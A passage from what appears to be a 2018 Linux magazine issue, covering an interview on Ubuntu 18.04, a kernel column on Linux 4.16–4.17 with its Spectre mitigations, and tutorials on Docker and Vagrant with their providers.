steal keyboard input events from other applications. You can’t pop up an
invisible window over the top of another application and steal things
that way.

So security-wise, Wayland is definitely much better than X.Org. So if
we were intending to ship Wayland in 18.04 and then support it for five
years, we had to be sure that it met not only our quality requirements,
but the use cases for our users. So we shipped it in 17.10 as the default,
and then if there were problems with it, you could quite easily switch to
X.Org. The feedback we got from our users was that it’s not quite stable
enough, and that’s a combination of bugs in Wayland, bugs in display
drivers, and strange hardware that’s out there. The other one was screen
sharing, and that was a critical request. Wayland, at the moment, doesn’t
allow that. It’s in the works, and it will come in time, but it wasn’t
there today.

There are a couple of technologies that seem to be in the works in
regard to Wayland, such as PipeWire (https://pipewire.org) you’ve alluded
to – can you tell us more about that?
WC: PipeWire’s been described as PulseAudio for video. That’s quite
a tidy explanation. But the problem with that is, in the early days of
PulseAudio, it didn’t have a stellar reputation. I think that [the PipeWire
devs] are quite keen to avoid drawing those similarities between the
two projects. But it will give us a pipeline video bus, if you like, where
you can plug different bits in at different places – as you can with audio.
You could have audio coming out of your speakers. You could have it
coming out of remote speakers. It could be streamed over the network.
It could be written to disk. All of these things that you can do with audio,
you’ll be able to do with video.

Part of that API is that it’s a good natural fit for screen sharing, for
there to be another sink for you to dump video into that can then be
picked up by

Quick guide
Encryption changes
In September 2017, Dustin Kirkland, former VP of Product, indicated
that Canonical had done a lot of work with Google on ext4 encryption
with fscrypt. Eventually, he said, they planned to deprecate eCryptfs.
In fact, the release of Ubuntu 18.04 sees the removal of eCryptfs
entirely, along with any option to encrypt the home drive in the 18.04
installer. This might sound like a worrying change, but, according to
Will Cooke, this was done because the service is unmaintained – or, as
the Launchpad bug report elaborates, ‘Buggy, under-maintained, not
fit for main anymore; alternatives exist’. “It would be unfair on our users
to keep ecryptfs in main for 18.04,” Cooke confirmed later in an email,
“if we cannot be 100% certain that it will be supportable for the duration
of the LTS life.”
Ubuntu’s position is that full disk encryption using Linux Unified Key
Setup-on-disk-format (LUKS) is the preferred method. eCryptfs has
been moved from the main repo to universe, if you still want to use
it. Currently, Canonical has confirmed that fscrypt is not considered
mature enough to feature in 18.04, but will be a target for 20.04.

Above According to Will Cooke, eCryptfs baffled some users: “We had
full disk encryption and home directory encryption… Why would I want
to do one over the other?”
Top features of Ubuntu 18.04 – see page 58

other applications, and processed and streamed and all the other kinds
of things.

That needs those applications to support the API, and they won’t do
that until it’s finished and is stable. So it’s still relatively early in the
development cycle of PipeWire. It will probably make an appearance
in 18.10 – certainly 19.04. And then hopefully the browsers, for example,
will pick up on it, and integrate support for it into their packages, and
then we’ll be in a good place to leverage it.

NVIDIA doesn’t support some of the APIs that are required for the
Wayland compositors, so is Wayland ever going to reach a level of
stability that’s acceptable for an LTS?
WC: Yes, it will do, I’m pretty sure of that. There were some changes in
the APIs which meant there was some incompatibility there. But they’re
being addressed. There were known issues, known bugs, and they will be
fixed, no doubt about that.

So there’s no question that NVIDIA is just not interested in Wayland
and doesn’t want to incorporate –
WC: No, no, they definitely care about that. But also, we’ve got a really
good reputation with NVIDIA through their deep-learning AI side of
things as well. The deep-learning stack that comes from NVIDIA, it’s
all built on Ubuntu. So we have a really good relationship with those
guys already. And we have regular calls on these sorts of issues – not
only the massive parallel processing compute side of things; the
graphical side of things is also being discussed directly with those
graphics card vendors on a regular basis. So yeah, I have no doubt that
we’re in a good position to be able to get those bugs fixed. And they do
care. They absolutely do care.

You’ve also been experimenting with Zstandard compression.
How’s that going?
DAVID BRITTON: We did some work, this cycle, to bring the latest
supported version of Zstandard back to Xenial. There’s also been some
talk on the APT compression front, offering Zstandard as an alternative
to GZIP and XZ compression and the other compression types that are
there. And then possibly changing that in the 18.10, maybe 19.04
timeframe, for the default, for APT compression. We were looking at it
for 18.04, but it’s just a bit too early to make that kind of a change. It
looks very promising, but it looks more like an 18.10 timeframe where
we’ll have that data.

As with the desktop, you also ran a survey for the server side of things.
What responses did you get from that?
DB: Ubuntu-Minimal came out of one of those feedback requests that
we did. [Another] bit of feedback that we received from the community
was that the old Debian installer was just clunky and hard to navigate.
So we’ve spent time over the past couple of cycles making a new server
installer, based on that feedback. The server installer is called Subiquity,
with the desktop installer called Ubiquity. That is a new image-based
installer that goes significantly faster than the old package-based
installer. Also, it asks you far fewer questions. The idea is that it asks you
how to configure the network, how you want to configure your disks, and
then it installs. So that nice ‘just press Enter’ workflow through the
program takes just a few minutes to get through, and you’re done.

Moving on to other things that we got feedback on… one that’s coming
up is that networking has always been difficult to configure on Ubuntu.
It is something that is called /etc/network/interfaces, or ENI for short.
That is a legacy system that spans multiple generations of Unix in
different forms. In the modern world, there are two ways to configure
networking. One is NetworkManager, which is used mostly on desktops
and IoT devices. The other one is systemd-networkd, which is a systemd
module for configuring networking, which we are targeting for the
server environment.

Since there are these two different ways to configure it, they have their
own little quirks. Ubuntu is launching in 18.04 a tool called netplan.io.
It’s a configuration generator. So you type in a very simple YAML format –
how you want your network to look. It can be as simple as three lines.
It will render the correct back-end networking data for either
NetworkManager or systemd-networkd – whichever system you happen
to be on. It kind of simplifies the way that you can view networking.

One [feature], which is a small thing, but people clamour for it: htop.
Anywhere that Ubuntu Server is installed, htop will now be available and
supported by Canonical. That is a big one for sysadmins who have been
asking for it for a while. The last one that I wanted to bullet point was
LXD 3.0, which is Canonical’s supported container solution.

Above Ubuntu 18.04 benefits from GNOME 3.28’s improvements to
GNOME Boxes, which makes spinning up new VMs really simple, albeit
with limited options

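To give a flavour of the netplan workflow Britton describes, here is a minimal sketch of a config. The device name enp3s0 and the file name are illustrative assumptions, not taken from the article; the point is that a DHCP-configured Ethernet port really does come down to a handful of YAML lines:

```yaml
# /etc/netplan/01-netcfg.yaml (illustrative): netplan renders this into
# NetworkManager or systemd-networkd configuration, whichever back-end
# the system uses.
network:
  version: 2
  ethernets:
    enp3s0:
      dhcp4: true
```

After editing the file, `sudo netplan apply` regenerates and applies the back-end configuration.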

opinion

The kernel column


Jon Masters summarises the latest happenings in the Linux kernel
community: Linux 4.17-rc1 is released, development continues on 4.18

Jon Masters
Jon is a Linux-kernel hacker who has been working on Linux for more
than 22 years, since he first attended university at the age of 13. Jon
lives in Cambridge, Massachusetts, and works for a large enterprise
Linux vendor, where he is driving the creation of standards for
energy-efficient ARM-powered servers.

Linus Torvalds has announced Linux 4.16, noting that things had calmed
down sufficiently at the last minute to avoid the need for an RC8 (Release
Candidate 8). Those things that had remained in flux toward the end were
mostly networking-related, and the networking maintainer had explicitly
said he was okay with it. The 4.16 kernel includes a number of new
features, among them AMD’s Secure Encrypted Virtualization (SEV), and
many additional mitigations for Meltdown and Spectre security
vulnerabilities across various architectures.

On the latter point, 4.16 pulled in upstream mitigations for Spectre
variant 1 (bounds-check bypass) exploits. These rely upon vulnerable
code sequences within the kernel that attempt to test whether an
untrusted value provided by the user (that is, the application) is within
a permitted range. Processing of that data should not continue unless
it lies within a desired range, but many processors will speculatively
continue execution beyond the check before they have completed the
in-bounds test. Addressing Spectre variant 1 is currently a matter of
identifying vulnerable kernel code (through a scanner) and wrapping it
with one of various new macros, such as ‘array_index_nospec()’. This
prevents speculation beyond the bounds check in a portable manner.

At an architectural level, Meltdown mitigation using KPTI (Kernel Page
Table Isolation) was merged for arm64 in 4.16, as well as support for
Spectre variant 2 mitigation through branch predictor invalidation (via
Arm Trusted Firmware). s390 (mainframe) gained a second mitigation
for Spectre variant 2, complementing the existing support for branch
predictor invalidation, using a new concept known as an ‘expoline’.
While x86 implements ‘retpolines’ (return trampolines) that make
vulnerable indirect function calls appear to be not-vulnerable function
returns, s390 makes these indirect calls appear to be execute-type
instructions exposed through the new execute trampolines.

Heavy on the security
With the release of 4.16 came the opening of the 4.17 merge window.
This is the period of time, typically two weeks, during which Linus will
pull vetted but potentially disruptive changes and new features into
a future kernel. This culminates in a Release Candidate 1 (RC1) kernel,
as it did with 4.17-rc1. The latest kernel is once again fairly heavy on
the security features, including receive-side support for TLS (the kernel
now has complete in-kernel TLS support), various additional capabilities
in the BPF packet filter, and robustness enhancements for mounting
ext4 filesystem images by untrusted users.

The latter comes with a warning from ext4 filesystem maintainer Ted
Ts’o. He hopes container folks don’t “hold any delusions that mounting
arbitrary images that can be crafted by malicious attackers should be
considered sane”. Finally, 4.17 will minimally require GCC 4.5 on x86 –
which is true of all Linux distros from the past few years – due to a now
non-optional feature (assembly language ‘goto’ jump support)
dependency.

Perhaps the most interesting development in 4.17, at least for me, is
the removal of support for eight – yes, eight – different architectures.
While Linux prides itself on being progressive and reasonably swift in
adopting support for the latest hardware, it traditionally has been less
swift in the removal of support for long-dead software features and
hardware devices. There are many stories over the years of Linux
retaining support for hardware that is no longer available, sometimes
for amusingly perverse periods of time. In some cases, this is a great
thing, since upstream may continue to provide a certain level of support
for popular hardware even after the company that built it goes away. But
in other cases, code can ‘bit-rot’ and simply occupy space, consuming
developer time in unneeded maintenance.

This was the case with the eight architectures removed in 4.17. Arnd
Bergmann had given plenty of notice of candidates for removal,
ultimately working with the maintainers of blackfin, cris, frv, m32r,
metag, mn10300, score and tile to remove them from upstream Linux.
Of these, it’s likely that few people will have even heard of more than
one or two.

As Arnd put it, “In the end, it seems that while the eight architectures
are extremely different, they all suffered the same fate: There was one
company in charge of an SoC line, a CPU microarchitecture and a
software ecosystem, which was more costly than licensing newer
off-the-shelf CPU cores from a third party (typically ARM, MIPS, or
RISC-V). It seems that all the SoC product lines are still around, but have
not used the custom

CPU architectures for several years at this point”. In other words, the
companies remain, but they’re all using
commodity cores at this point.
On a side note, it was recently discovered that support
for (much older) IBM POWER4 systems was accidentally
broken back in 2016. As nobody has complained about
it since then, this support has also been removed
from upstream. Of course, POWER remains a popular
architecture, with great upstream support for all of the
latest POWER8 and POWER9 hardware. Sometimes
even well-maintained architectures benefit from a little
spring-cleaning of older code.

Fuzzing, RISC-V and more


Syzbot is a “continuous fuzzing/reporting system
based on syzkaller fuzzer”. It sends periodic emails to
the Linux kernel mailing list with logs about code that
crashed when it was fuzzed – that is, fed garbage data.
Dmitry Vyukov (Google) announced that there is now a
dashboard available at https://syzkaller.appspot.com
through which developers can access all outstanding bug
reports. In a follow-on discussion with Linus, Dmitry took various
feedback on ways to improve the tool, which he swiftly implemented.

The RISC-V architecture is continuing to gain momentum. The latest
patches resolve issues found when building modules for 64-bit kernels.
The addresses of functions contained within those modules need to be
used in function calls (jumps) that must be relocated (fixed up) on module
load. RISC-V kernel support was missing some standard relocation types
needed to handle this. Incidentally, we’ll have more on RISC-V in a
forthcoming issue, including a review of the SiFive HiFive Unleashed
development board running Fedora.

Matthew Wilcox posted version 9 of his XArray replacement for the
existing in-kernel radix tree implementation. He had hoped to see this
merged for 4.17, but obviously has been at this game long enough to
have known that it would be a long shot. Andrew Morton commented
that one of the patches could come in as-is, while with some of the
others he “ran out of nerve”. Not to fear – another kernel cycle is just
around the corner for these patches.

Laurent Dufour posted version 9 of his ‘Speculative page faults’
patches. We’ve mentioned these before – they’re a more positive use of
the term ‘speculation’ than we’ve seen of late. The basic idea is to try to
handle userspace page faults, which happen when an application
accesses memory that hasn’t yet been allocated, is still on disk due to
being paged or swapped to disk, or is application data not yet loaded.
The new patch makes the assumption that this memory doesn’t touch
regions of memory shared with other threads. If it does, then the fault is
re-tried with locks held.

Alexander Duyck posted “Add support for unmanaged SR-IOV”, which
aims to address the exploding complexity of SR-IOV (Single Root I/O
Virtualization) solutions on servers today. SR-IOV allows Virtual
Functions of PCIe devices to be passed through directly to virtual
machines, which can then use those functions as if they were standalone
devices. For example, a GPGPU with SR-IOV support could allow multiple
VMs to each have its own ‘GPU’. SR-IOV today requires both a PF
(Physical Function) driver in the host, as well as VF (Virtual Function)
drivers in guests. It would appear that Intel is interested in providing a
generic PF solution in pci-pf-stub.

Feature Take control of containers

Containers Bobby Moss explores how containers and


scripts can save you time, help to recover
systems and make deployments easier

Back in the mists of time, Marc Andreessen coined the phrase “Software
is eating the world” in an oft-quoted essay he wrote for the Wall Street
Journal. In 2011 he foresaw that virtualisation and abundant hardware
resources would lead to vast data warehouses and increasing systems of
automation that would disrupt how every industry across the world
works. Now, in 2018, almost every company needs to be a software
company to compete effectively within its market.

There are so many problems that automation can solve for us. For
example, a common issue affecting network administrators is that
different servers across a network can have different configurations and
different versions of software packages running on them.

Tutorial files
available:
filesilo.co.uk

at a glance
Where to find what you’re looking for

• Docker deployments, p20 – Discover everything that you need to get
started with creating, running and managing Docker containers, on web
developer workstations through to enterprise servers.
• Script with Vagrant, p22 – Fully automate the creation of virtual
servers and environments across different devices, machines and OSes
with the help of a scripting language.
• More Vagrant providers, p24 – Extending our automation of virtual
server creation to enterprise platforms such as Hyper-V and VMware
vSphere, as well as cloud platforms like AWS and Azure.
• Puppet provisioning, p26 – Centrally manage web applications and
keep server configurations synchronised across your devices and
networks with this established and well-supported tool.
• Configure Ansible, p28 – Set up a worthy alternative to Puppet and
Chef, then use it to manage applications and configuration files across
machines by writing your very own playbooks.

Puppet and Ansible can centrally manage configuration files, package
versions and scripted deployments, so you can tweak settings, perform
upgrades and roll everything back to a ‘known good’ state across your
entire network almost instantly.

Another problem used to be that sysadmins would have to over-provision
their server resources to allow for peak loads and futureproofing. With
the introduction of cloud computing and supporting systems to augment
on-site infrastructure, this has become much less of an issue, but making
good use of virtualisation can ensure you make even better use of
existing on-site hardware resources first.

We’ll be exploring Vagrant in this feature in some depth; it’s a system
that can automate the creation, editing, running and deletion of virtual
machines across all kinds of different machines and virtualisation
products. We’ll also cover how it can be used to spin up environments
that are representative of ‘production’ on your workstation, so that you
can run behaviour-driven tests against them. This means you can check
that your web applications match customer requirements and pass all
your continuous integration tests before you even push your code to
version control. In the long run this means fewer bug tickets, more stable
production environments and less time spent puzzling out what a
mysterious log entry means during a critical outage.

We’ll also look at Docker. This technology packages individual
applications into a container that’s far more lightweight than a virtual
machine. This means developers can spin up containers without setting
up an entire development environment, and emulate the network
infrastructure and dependent components that their scaled applications
will be relying on once those apps are released.

Sysadmins will also be particularly excited about containerisation,
because it means that when developers decide to use technologies that
aren’t already supported internally (such as NodeJS, the Go language,
Python 3 and so on), you no longer have to deal with a kind of
‘dependency hell’ on your existing server operating systems, or puzzle
out from patchy documentation how to successfully install an
application. Simply deploy the container on your server and it should
work exactly the same way it did for the original developer, in any
environment you choose to deploy it in.

The other great thing about automation, virtualisation and
containerisation is resilience. If an application goes down it doesn’t
matter, because you can kill it and start another one in a matter of
seconds. When your network is under peak load you can instantly
provision more virtual servers to cope, then delete almost all of them as
soon as it troughs.

Lastly, we haven’t forgotten those of you who are just dipping your toes
into Linux administration for the first time, developers living under
restrictive corporate policies, or sysadmins dealing with mixed
infrastructure containing Windows and Mac servers. All the technologies
used throughout this feature are cross-platform, and we’ll even be
discussing how to use Vagrant with commercial products such as
VMware vSphere and Microsoft’s Hyper-V virtualisation technology.


Docker deployments
Package your applications for easy deployment and run them on any system

T
he central premise of Docker is
that you should be able to package
any application once in a
‘container’ and then run it anywhere without
needing to install any extra dependencies.
The project itself was originally released
in 2013 by Solomon Hykes, building on
isolation features already present in the
Linux kernel. Hykes became renowned for
keeping tight control over the way the
product was developed and evolved by the
wider community.

Above Docker Compose makes testing database-driven sites with multiple containers easy
Above With one command in the terminal, you can have a web server up and ready for testing

The way Docker differs from a standard virtualisation system, such as Oracle VirtualBox or VMware Workstation, is that it uses the resource-isolation features of the host Linux kernel rather than just the virtualisation features of the CPU. As a result, Docker uses far less memory and processing power, and the individual application containers it generates are much smaller and easier to distribute than full-blown virtual machines packaged with their full-sized virtual hard drives.
There are two versions of Docker: the Community Edition and the Enterprise Edition. Both have the same core functionality and are licensed under the Apache License v2, but the latter comes with a support contract and the ability to run 'certified' containers on infrastructure hosted by Docker Inc. In this feature we'll be looking at the Community Edition, as anyone – regardless of whether they're a hobbyist developer or an in-house IT technician – can download and use it. Everything we cover should also work on the Enterprise Edition.
The first thing you'll need to do is install the Docker daemon that tracks the containers you launch, and the Docker client that launches them in the first place – just follow the walkthrough below. Once you have familiarised yourself with the basics you can try running a simple web server:

$ docker run --name mywebsite -P -d nginx

This creates a new Docker container called 'mywebsite' and launches a pre-configured container with Nginx (our web server) installed. There are two additional flags: -P exposes ports 80 and 443 (HTTP and HTTPS) from the container and maps them to a new value, so we can call them from the localhost domain or the IP address 127.0.0.1. -d runs the image in detached mode, so the container won't listen to any further terminal input and will keep running until you specifically choose to destroy it.
You should be able to use the same verification step from the walkthrough below to verify that the container has been created and is running as expected. The local port mapping will also be listed, so assuming port 80 on the container is mapped to 49153, for example, you can even see the web server

how to
Set up and use Docker

1 Install Docker
Find instructions on how to configure your package manager and install both the Docker daemon and client app at http://bit.ly/lud_install. If this doesn't work you could also try installing the binaries from http://bit.ly/lud_binaries.

2 Set up Docker Compose
This is a helpful tool for creating applications that span multiple containers, such as a website that's split into a webserver, database and content hosting components. See http://bit.ly/lud_compose for installation details.

3 Create a container
Pull down a new container, verify it's installed and run it with:

$ docker pull busybox
$ docker run busybox echo "testing my container"

test page in Mozilla Firefox or from the terminal with:

$ curl http://localhost:49153

However, a web server is only as good as the website it's serving. Currently all we have is an Nginx test page; we need to get some HTML files into the Docker container, and there are three ways of going about this. One would be to run the container without detached mode so we can still SSH into it and transfer files using SCP. Another would be to specify data directories when we first launch our Docker container. For example, you could map the contents of /var/www to Nginx's default web directory in Docker using:

$ docker run --name website2 -v /var/www:/usr/share/nginx/html:ro -P -d nginx

The ro in this line ensures that file contents can only be edited on the host system and not by any processes that might be running in the container.
The other way to do this is to define which files you want to copy to the container using a file called Dockerfile, with no extension. We have some examples on the coverdisc and Filesilo, but the content in this case would be:

FROM nginx
COPY content /var/www
VOLUME /usr/share/nginx/html

Once you are ready you would rebuild and run your container using

$ docker build -t mywebserverimage .
$ docker run --name mywebserver4 -P -d mywebserverimage

You should then be able to see your new website being served at the new localhost port mapping.
Now, let's say we have a more complex set of requirements, such as developing a database-driven website. Rather than manually specifying each individual container we can use Docker Compose to automate this in a single step. On the coverdisc we have a sample Dockerfile with an Ansible provisioning script that will install Ruby on Rails with a PostgreSQL database. Once you have extracted the tarball the following pair of commands builds it:

$ docker-compose run web rails new . --force --database=postgresql
$ docker-compose build

Next replace the generated config/database.yml with our version so that Rails no longer tries to connect to the host system, then run the following in two different terminal windows:

$ docker-compose up
$ docker-compose run web rake db:create

At this point you should be able to visit the Rails welcome page via http://localhost:3000.

quick tip
Roll your own containers
The easiest way to create your own containers is to fetch vanilla 'ubuntu' or 'coreos' and customise it with your Dockerfile. You can then use 'docker build' and 'docker save' to create and export the final product.

Above Search for more pre-built containers on Docker Hub, https://hub.docker.com/explore
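The actual Compose and configuration files for this example are on the coverdisc, but as a rough sketch of the shape they take – the web and db service names match the docker-compose commands above, while the image, paths and port mapping are our own illustrative assumptions – a docker-compose.yml for a Rails site backed by PostgreSQL looks something like this:

```yaml
# Illustrative docker-compose.yml only - not the coverdisc version.
# 'web' and 'db' match the service names used in the commands above;
# everything else is an assumption for the sake of the sketch.
version: '2'
services:
  db:
    image: postgres          # official PostgreSQL image from Docker Hub
  web:
    build: .                 # built from the Dockerfile in this directory
    command: rails server -b 0.0.0.0
    volumes:
      - .:/myapp             # keep the Rails source editable on the host
    ports:
      - "3000:3000"          # serves the Rails welcome page on localhost:3000
    depends_on:
      - db                   # start the database before the web container
```

With a file of this shape in place, commands such as docker-compose run web and docker-compose up know which container each service lives in.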

4 Check container status
You can view all the currently installed container types using docker images. To get more useful information such as which containers are running and what they're up to, you should try: $ docker ps -a.

5 Access your container
Connect to your container and run multiple commands using -it:

$ docker run -it busybox sh
# ls
# ps -a

6 Destroy your container
After fetching the container ID using the second command in step 4, you can stop and remove that specific instance with $ docker rm -f containerid. On successful deletion you should see the containerid displayed.


Script with Vagrant


Automate the creation and management of virtual machines across servers

Vagrant is a mature product
sponsored by a company called
Hashicorp. Its main purpose is to
provide a common command-line interface
and provisioning structure across different
virtualisation technologies. This means you
can use the same commands with Oracle
VirtualBox as you would with VMware
Workstation and Hyper-V. Vagrant
accomplishes this through the use of drivers
which provide a wrapper for the command-
line interface of whichever product you are
provisioning your virtual machines with.
This also means you can create a single
script to provision your server infrastructure,
and if your on-site servers run out of space
– or you use up all the licenses you’ve paid
for – the same VMs can be created using
a different product or cloud provider. This makes Vagrant a very powerful tool for sysadmins looking to roll out their own software-defined networks.

Above When only a GUI will do, you can edit your Vagrantfile to install a desktop and not run headless

quick tip
Managing Vagrant plug-ins
You can check which plug-ins have been installed with the command $ vagrant plugin list. Simply replace list with update to download new versions of these plug-ins, and to add new functionality try vagrant plugin install vagrant-exec.

Developers will also find Vagrant particularly useful because they can create a common desktop environment with all the required IDEs and tools installed and roll this out quickly and easily for new team members. It's also possible to simulate a full server that's more representative of a production environment – particularly useful for software testing. You may be wondering how Vagrant ties in with app containerisation. Well, Vagrant can provision Docker containers in exactly the same way it does with VMs. It's also possible to deploy a Docker container on any virtual server within your network by setting it as the application 'provisioner' Vagrant runs after creating and booting a VM.
The first step is to install your virtualisation platform of choice. Vagrant supports Oracle VirtualBox natively, as long as you also install its associated extension pack. VMware Workstation is also supported on local desktops, but you will need to purchase the proprietary Hashicorp driver for Vagrant to work with this 'provider'.
Next, fetch the installer from www.vagrantup.com. You should avoid installing Vagrant through your package manager, as it will often be an old version that may not be fully compatible with the latest and greatest release of VirtualBox.
As soon as the install is complete you can boot your first virtual machine, without any prior configuration, using just a few simple commands. For example:

$ mkdir test && cd test
$ vagrant init bento/ubuntu-18.04
$ vagrant up

You'll notice that no extra windows have appeared on the screen. That's because Vagrant VMs run headless by default, so you would access it using

$ vagrant ssh-config
$ vagrant ssh

Any file that you place in the same directory as Vagrantfile will also be available to the guest operating system under /vagrant. However, you may wish to run a full GUI on your VM, and in that situation a headless setup with only SSH access wouldn't be particularly helpful. Fortunately, there's a way to change this behaviour.
You may have noticed that when you ran vagrant init, a file was created in the test directory called Vagrantfile. This is where you can tweak the settings for your VM, and by default it is filled with plenty of hand-holding comment lines to help you navigate it. You will notice that config.vm.box defaults to base, or whatever you stated as a choice when you ran the vagrant init command. Scroll past the sections for port forwarding and shared folders, and you'll find the following code line:

22
# vb.gui = true

Unfortunately, just uncommenting that line by removing the # won't work. Vagrant is built on Ruby, so you need to ensure the config.vm.provider line and its matching end are also uncommented. Once you've saved your changes you can restart the VM with

$ vagrant reload

If all has gone well you should now see a VM window appear with a shell login prompt. The VM we specified earlier is a server distribution of Ubuntu 18.04, so to install the GUI we would need to install ubuntu-desktop through the package manager. Just like real machines, VMs take a while to boot up, so you may prefer to save the current machine state and resume from it instead. You can do this with

$ vagrant suspend
$ vagrant resume

You can gracefully shut down a VM by telling it to halt, and once you're done with the box you can delete it with destroy. If you need to verify the current state of your VM before you run any commands at all, you can get some useful output from:

vagrant status

It's also wise to take regular snapshots which you can roll back to if you make any mistakes or run into problems. The pair of commands you need for this are

vagrant snapshot save REF
vagrant snapshot restore REF

where REF is whatever you want to call your snapshot. The first command creates the snapshot while the latter restores from it.
We mentioned earlier that it's possible to forward ports with your Vagrant VMs. By default the only forwarded port is SSH, which is mapped to localhost:2222, and all others are inaccessible from the host system. Simply uncomment a single line in your Vagrantfile to map HTTP port 80 to http://localhost:8080. You can also copy and paste this line, editing the port numbers as needed for the app you're running in your VMs.

quick tip
Create your own box
It's possible to create your own base image for Vagrant and provision VMs using it. You will need to tweak your base image, populate a metadata JSON file and then package it for your provider. Find out more at www.vagrantup.com/docs/boxes/base.html.

products
Hot Vagrant plug-ins
Extending functionality is a vagrant plugin install command away

1 BDD with Cucumber
With the help of vagrant-cucumber, you can run all your behavioural tests locally against your Vagrant VM. To launch them, copy your pre-existing .feature files and step definitions to the Vagrantfile folder and run vagrant cucumber from there.

2 Shell commands
vagrant-exec runs shell commands inside your VM, and you can do this by navigating to the Vagrantfile directory and prefixing each one with vagrant exec. It's easy to remember and means you don't need to create a new SSH session each time.

3 Fabric provisioning
vagrant-fabric takes things a step further by enabling you to execute scripted actions and deployments with the help of a Python 2.7 extension called Fabric. Use it as a provisioner in your project's Vagrantfile.

Above Hashicorp's documentation covers provisioners, providers, command line help and Vagrantfiles
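Putting the GUI and port-forwarding options from this section together, the relevant stanzas of a Vagrantfile end up looking something like this – the box name matches the earlier vagrant init example, while the memory figure is just an illustration of our own:

```ruby
# Sketch of a Vagrantfile combining the options discussed above.
Vagrant.configure("2") do |config|
  config.vm.box = "bento/ubuntu-18.04"

  # Map guest HTTP port 80 to http://localhost:8080 on the host.
  # Copy this line and edit the numbers for any other services.
  config.vm.network "forwarded_port", guest: 80, host: 8080

  config.vm.provider "virtualbox" do |vb|
    vb.gui = true       # show a VM window rather than running headless
    vb.memory = "2048"  # illustrative value, not from the article
  end
end
```

After editing, a vagrant reload picks up the changes just as described above.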

www.linuxuser.co.uk 23
Feature Control Containers

More Vagrant providers


Use your scripts with commercial virtualisation platforms and the cloud

Vagrant's native support for Oracle VirtualBox is not your only option for using it. Thanks to community plug-in support and code contributions, it's also possible to use other providers. This is particularly useful in enterprise settings where you might already be running something more scalable like OpenStack or VMware vSphere. As an example, you can use Docker as a provider for your Vagrant configurations on Linux hosts just as easily as you would VirtualBox. The only difference is the exact set of commands you would use to do that in your Vagrantfile:

Vagrant.configure("2") do |config|
  config.vm.provider "docker" do |d|
    d.build_dir = "."
  end
end

This tells Vagrant to use Docker as a provider, and then instructs that provider to build a container from the Dockerfile you've provided. To directly download a container image and run it, replace d.build_dir with:

d.image = "nginx"

In both cases Vagrant is smart enough to forward the right ports and set up a folder share with the same directory as your Vagrantfile. If you're trying to do either of these things on a non-Linux host system, Vagrant will attempt to provision a VirtualBox VM from a 'boot2docker' image first so it can still set up your Docker containers as instructed.
OpenStack is intended to be a free and open source software platform for in-house cloud computing. OpenStack itself can be tricky to set up on test rigs and it needs a lot of raw hardware power to be useful. Fortunately, you can use PackStack to build everything with Puppet: see https://wiki.openstack.org/wiki/Packstack.
Just like our Docker provider you can use specific settings in your Vagrantfile to provision new instances on OpenStack, and you can see a sample of this on its GitHub page, http://bit.ly/lud_openstack. Unlike the Docker provider you will need to install the OpenStack provider as a plug-in:

vagrant plugin install vagrant-openstack-provider

If only one provider is specified your Vagrantfile should default to using it. However if you have more than one specified, or Vagrant doesn't seem to be detecting it, you can force a specific provider choice:

vagrant up --provider=openstack

quick tip
Try Kubernetes with Vagrant
Sometimes Docker containers need to be deployed at scale and that's where Kubernetes comes in. Try it out locally with Vagrant by cloning the project's official GitHub project and running $ export KUBERNETES_PROVIDER=vagrant then $ ./cluster/kube-up.sh

Above Provisioning Docker containers with Vagrant is handled just as elegantly as VMs

Another popular (albeit non-free) enterprise

Quick guide
Vagrant in the cloud
Scripting and managing your own servers and in-house infrastructure is far from the only use for Vagrant. There are community providers for a whole host of cloud platforms, which means that you don't need to create new scripts for different APIs every time you want to create VPSs with a new provider.
However, there are certain limitations. For example, AWS creates new services on an almost daily basis and there is only a limited subset of its API that's going to have functionality in common with Azure and Google Cloud. As a result you may still need to use a mix of Vagrant and custom scripts to get the most out of your subscriptions.
However, if you just need to create the same EC2 instances on a regular basis, and can skip tools like Elastic Beanstalk, you can provision a VM by specifying your AWS authentication settings and AMI configuration using the sample Vagrantfile at http://bit.ly/lud_aws.

Above Hashicorp provides its own service for provisioning VMs across multiple cloud providers
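We can't reproduce the full sample here, but the general shape of a Vagrantfile using the community vagrant-aws plugin is along these lines – every value shown is a placeholder of our own, so treat this as a sketch rather than a working configuration:

```ruby
# Hypothetical vagrant-aws configuration - all values are placeholders.
Vagrant.configure("2") do |config|
  # vagrant-aws conventionally uses a 'dummy' box, since the real
  # machine image comes from the AMI specified below.
  config.vm.box = "dummy"

  config.vm.provider :aws do |aws, override|
    aws.access_key_id     = ENV["AWS_ACCESS_KEY_ID"]
    aws.secret_access_key = ENV["AWS_SECRET_ACCESS_KEY"]
    aws.ami               = "ami-xxxxxxxx"   # placeholder AMI ID

    override.ssh.username         = "ubuntu"            # depends on the AMI
    override.ssh.private_key_path = "~/.ssh/mykey.pem"  # your key pair
  end
end
```

The sample Vagrantfile linked above shows the authentication and AMI settings in full.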

24
Top Left Vagrant makes light work of automating the provision of VM infrastructure with OpenStack
Above Left Provider plug-ins normally supply a handy sample Vagrantfile with the original source
Above Right Vagrant supports Hyper-V, but some extra manual preparation steps are required

quick tip
Alternative provisioners
In this feature we primarily focus on Puppet and Ansible, but these are not the only provisioning systems available. Chef is a well-established alternative and a new Python-based system called SaltStack is now available. Both are supported as Vagrant provisioners.

virtualisation platform is VMware vSphere. Just like OpenStack it's supported as a Vagrant provider once you've installed the plug-in for it:

vagrant plugin install vagrant-vsphere

You have the choice of building from a box or re-using any from within vSphere. Any boxes you create with VMware Workstation will usually work with vSphere after some minor tweaks because of the shared underlying technology, although you may find it easier to simply import the VM image through the management console and use it as a server template instead. Read more at http://bit.ly/lud_vsphere.
Finally, if the virtualisation product you use is based on the XenServer hypervisor, you're also in luck. The vagrant-xenserver provider plug-in requires you to create your own boxes, but fortunately you have some options. XVA files stored locally on the hard disk or at a network location are supported, as are generic VHD files, which you can create in any VirtualBox VM. See http://bit.ly/lud_xen for more on this plug-in.
KVM is also supported as a provider by the vagrant-libvirt plug-in, but you'll need to install a number of packages before it will build and run correctly. You can find out which ones you need and how to install them on your distribution of choice at http://bit.ly/lud_libvirt.
Another popular virtualisation platform in many businesses is Hyper-V, an optional component for Windows that's been available since Windows 8 and Server 2008. This native hypervisor for the NT kernel was originally created to replace the venerable Microsoft Virtual PC, an application that can be best described as a Windows-only alternative to VirtualBox.
